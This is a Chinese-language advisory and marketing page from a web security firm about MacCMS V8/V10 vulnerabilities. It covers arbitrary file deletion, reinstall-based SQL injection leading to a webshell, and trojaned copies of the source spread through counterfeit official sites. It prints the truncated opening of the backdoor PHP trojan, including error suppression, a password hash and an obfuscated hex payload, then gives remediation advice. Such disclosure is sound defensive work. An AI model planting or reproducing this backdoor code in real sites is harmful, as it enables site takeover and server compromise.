蘋(píng)果CMS漏洞修復(fù) 對(duì)SQL遠(yuǎn)程代碼注入及任意文件刪除修補(bǔ)辦法

時(shí)間：2020-01-07作者：青島四海通達(dá)電子科技有限公司瀏覽：134

目前蘋(píng)果CMS官方在不斷的升級(jí)補(bǔ)丁，官方較新的漏洞補(bǔ)丁對(duì)于目前爆發(fā)的新漏洞沒(méi)有任何效果。較新補(bǔ)丁的用戶網(wǎng)站還是會(huì)遭受到掛馬的攻擊，很多客戶因此找到我們SINE安全尋求網(wǎng)站安全技術(shù)上的支持，針對(duì)該漏洞我們有著*特的安全解決方案以及防止掛馬攻擊的防護(hù)，包括一些未公開(kāi)的maccms POC漏洞都有修復(fù)補(bǔ)丁。

目前maccms官方被百度網(wǎng)址安全中心提醒您：該站點(diǎn)可能受到黑客攻擊，部分頁(yè)面已被非法篡改！ 蘋(píng)果官方網(wǎng)站因?yàn)樘厥庠蛞呀?jīng)停止訪問(wèn)，該內(nèi)容被禁止訪問(wèn)，但是升級(jí)補(bǔ)丁較新的網(wǎng)址還是可以打開(kāi)的。

截圖如下：

蘋(píng)果CMS漏洞詳情：

蘋(píng)果CMS V8 V10版本存在代碼重裝漏洞，以及代碼后門(mén)漏洞，任意文件刪除漏洞，通過(guò)CNVD-2019-43865的信息安全漏洞通報(bào)，可以確認(rèn)maccms V10存在漏洞，可以偽造惡意代碼發(fā)送到網(wǎng)站后端進(jìn)行執(zhí)行，可以刪除網(wǎng)站目錄下的任意文件，可刪除重裝蘋(píng)果CMS系統(tǒng)的配置文件，導(dǎo)致可以重新安裝maccms系統(tǒng)，并在安裝過(guò)程中插入sql注入代碼到數(shù)據(jù)庫(kù)中去執(zhí)行并獲取webshell以及服務(wù)器權(quán)限。

蘋(píng)果CMS V8 V10 源代碼存在后門(mén)漏洞，經(jīng)過(guò)我們SINE安全技術(shù)的檢測(cè)發(fā)現(xiàn)，存在后門(mén)的原因是，目前百度搜索蘋(píng)果官網(wǎng)，maccms官方，排在百度搜索首頁(yè)的都是仿冒的網(wǎng)站，包括模板，圖片，以及CSS跟真正的官方是一模一樣，很多客戶都是點(diǎn)擊到這個(gè)**網(wǎng)站上去進(jìn)行下載的源代碼，該代碼里隱藏了木馬后門(mén)文件,阿里云都無(wú)法檢測(cè)出來(lái)，

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標(biāo)題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代碼如上面所示，是加密過(guò)的，經(jīng)過(guò)我們SINE安全的解密發(fā)現(xiàn)是PHP的腳本木馬，可以繞過(guò)各大服務(wù)器廠商的安全檢測(cè)，包括阿里云，騰訊云，百度云，華為云。

關(guān)于蘋(píng)果CMS網(wǎng)站漏洞的修復(fù)方案與辦法

對(duì)任意文件刪除漏洞做安全過(guò)濾與檢查，防止del刪除的語(yǔ)句的執(zhí)行，對(duì)**傳輸過(guò)來(lái)的參數(shù)進(jìn)行嚴(yán)格的檢測(cè)，不管是get,post,cookies，如果您對(duì)代碼不是太懂的話也可以找專(zhuān)業(yè)的網(wǎng)站安全公司來(lái)處理解決蘋(píng)果CMS網(wǎng)站被攻擊的問(wèn)題，或者是對(duì)重裝文件進(jìn)行改名以及安裝配置文件進(jìn)行權(quán)限設(shè)置，只讀權(quán)限，對(duì)于存在網(wǎng)站木馬后門(mén)的蘋(píng)果cms系統(tǒng)，人工對(duì)代碼進(jìn)行安全審計(jì)，對(duì)所有網(wǎng)站目錄下每個(gè)代碼文件都要仔細(xì)的排查，可以下載官方的源代碼進(jìn)行比對(duì)。


青島四海通達(dá)電子科技有限公司專(zhuān)注于服務(wù)器安全,網(wǎng)絡(luò)安全公司,網(wǎng)站安全防護(hù),網(wǎng)站漏洞檢測(cè),滲透測(cè)試,網(wǎng)站安全,網(wǎng)站漏洞掃描,網(wǎng)站安全檢測(cè)等, 歡迎致電 13280888826

• 詞條

  詞條說(shuō)明

• 公司業(yè)績(jī)

  SINE安全公司研發(fā)的服務(wù)器安全防御系統(tǒng)，具有服務(wù)器攻擊自動(dòng)防御，網(wǎng)站攻擊安全分析，攻擊行為自動(dòng)攔截，調(diào)用底層IIS*墻，Linux內(nèi)核級(jí)*墻，遠(yuǎn)程桌面軍規(guī)認(rèn)證，端口安全過(guò)濾，多年來(lái)研發(fā)的內(nèi)部漏洞信息安全系統(tǒng)（包含各種開(kāi)源程序的漏洞，DEDECMS、DISCUZ、ECSHOP、Wordpress、Magento、PHPCMS、Thinkphp、馬克斯MAXCMS、等網(wǎng)站程序、以及MYSQL、A

• 服務(wù)器安全防護(hù)措施有哪些

  以下是一些常見(jiàn)的服務(wù)器安全防護(hù)措施：定期較新和升級(jí)操作系統(tǒng)和軟件，及時(shí)安裝較新的補(bǔ)丁和安全較新，以修復(fù)已知的漏洞和安全問(wèn)題。強(qiáng)化訪問(wèn)控制，包括使用強(qiáng)密碼、多因素認(rèn)證、限制登錄嘗試次數(shù)、限制遠(yuǎn)程訪問(wèn)等。只授權(quán)必要的人員訪問(wèn)服務(wù)器，并定期審查和較新訪問(wèn)權(quán)限。配置和管理*墻，限制入站和出站流量，阻止未經(jīng)授權(quán)的訪問(wèn)和攻擊?？梢允褂镁W(wǎng)絡(luò)安全設(shè)備，如入侵檢測(cè)和防御系統(tǒng)，監(jiān)控網(wǎng)絡(luò)流量和異?；顒?dòng)。使用加密協(xié)議和

• 滲透測(cè)試服務(wù)公司 對(duì)APP安全漏洞檢測(cè)詳情

  在對(duì)客戶網(wǎng)站以及APP進(jìn)行滲透測(cè)試服務(wù)前，很重要的前期工作就是對(duì)網(wǎng)站，APP的信息進(jìn)行全面的收集，知彼知己，才能較好的去滲透，前段時(shí)間我們SINE安全公司收到某金融客戶的委托，對(duì)其旗下的網(wǎng)站，以及APP進(jìn)行安全滲透，整個(gè)前期的信息收集過(guò)程，我們將通過(guò)文章的形式分享給大家.不管是安全滲透工程師還是白貓，在滲透測(cè)試過(guò)程中都很清楚，信息收集的重要性，我們SINE安全將以我們的角度去收集，去滲透，首先我們

• APP防攻擊安全防護(hù)知識(shí)點(diǎn)

  在當(dāng)今數(shù)字時(shí)代，移動(dòng)應(yīng)用的數(shù)量呈爆炸性增長(zhǎng)，涵蓋金融、電子商務(wù)、社區(qū)、醫(yī)療、房地產(chǎn)、工業(yè)等各行各業(yè)。在給人類(lèi)帶來(lái)便利的同時(shí)，也給黑客帶來(lái)了可乘之機(jī)，移動(dòng)黑產(chǎn)也越來(lái)越強(qiáng)大，他們的重點(diǎn)是從傳統(tǒng)的PC網(wǎng)站轉(zhuǎn)移到移動(dòng)互聯(lián)網(wǎng)的戰(zhàn)場(chǎng)。盡管?chē)?guó)內(nèi)近五年互聯(lián)網(wǎng)安全行業(yè)發(fā)展*，優(yōu)秀的安全防護(hù)產(chǎn)品層出不窮，但黑客攻擊手段也日益變化，想從根本上解決互聯(lián)網(wǎng)安全問(wèn)題，目前無(wú)從下手。以前，我們談過(guò)網(wǎng)站如何保護(hù)安全。今天，我們